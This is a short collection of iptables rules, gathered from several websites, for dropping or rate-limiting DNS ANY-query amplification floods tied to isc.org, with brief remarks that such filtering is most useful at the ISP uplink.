o simply DROP ALL udp packets from port 49940 ( the ANY isc.org udp flood
attacks )
o these ISC.org DDoS protection rules are productive only when defined at your
uplink at the ISP
if these isc.org iptables rules are at the firewall at your location,
the udp packets have already used your bandwidth; the bandwidth damage is
already done

o foxpa.ws example iptables rule defending against isc.org udp floods

# |03 isc 03 org 00| is the wire-format name isc.org
iptables -A INPUT -p udp --sport 25345 -d dns.server --dport 53 \
-m string --hex-string "|03697363036f726700|" --algo bm --to 65535 -j DROP
iptables -A INPUT -p udp --sport 25345 -d dns.server --dport 53 \
-m string --hex-string "|6973633f6f72673f|" --algo bm --to 65535 -j DROP

... etc .. etc ..

iptables -A INPUT ... -m limit ... -m connlimit .. -j ACCEPT

o AfriHost.com
# |00 00ff 0001| is the end of the query name followed by QTYPE ANY, QCLASS IN
iptables -A INPUT -p udp -m udp --dport 53 \
-m string --hex-string "|0000ff0001|" --algo bm --from 48 --to 65535 \
-m recent --set --name dnsanyquery --rsource

iptables -A INPUT -p udp -m udp --dport 53 \
-m string --hex-string "|0000ff0001|" --algo bm --from 48 --to 65535 \
-m recent --rcheck --seconds 60 --hitcount 5 --name dnsanyquery --rsource -j DROP

o github.com
also using -m string --from 50 --algo bm --hex-string '|0000FF0001|'

o JunkemailFilter.com defending against isc.org udp floods
iptables -v -I INPUT 1 -p udp --dport 53 \
-m string --from 50 --algo bm --hex-string "|0000FF0001|" \
-m recent --set --name dnsanyquery
iptables -v -I INPUT 2 -p udp --dport 53 \
-m string --from 50 --algo bm --hex-string "|0000FF0001|" \
-m recent --name dnsanyquery --rcheck --seconds 10 --hitcount 3 -j DROP

o MiniHowto.eu Protection Against isc.org ANY Attack
iptables -A INPUT -p udp -m connlimit --connlimit-above xx -j DROP
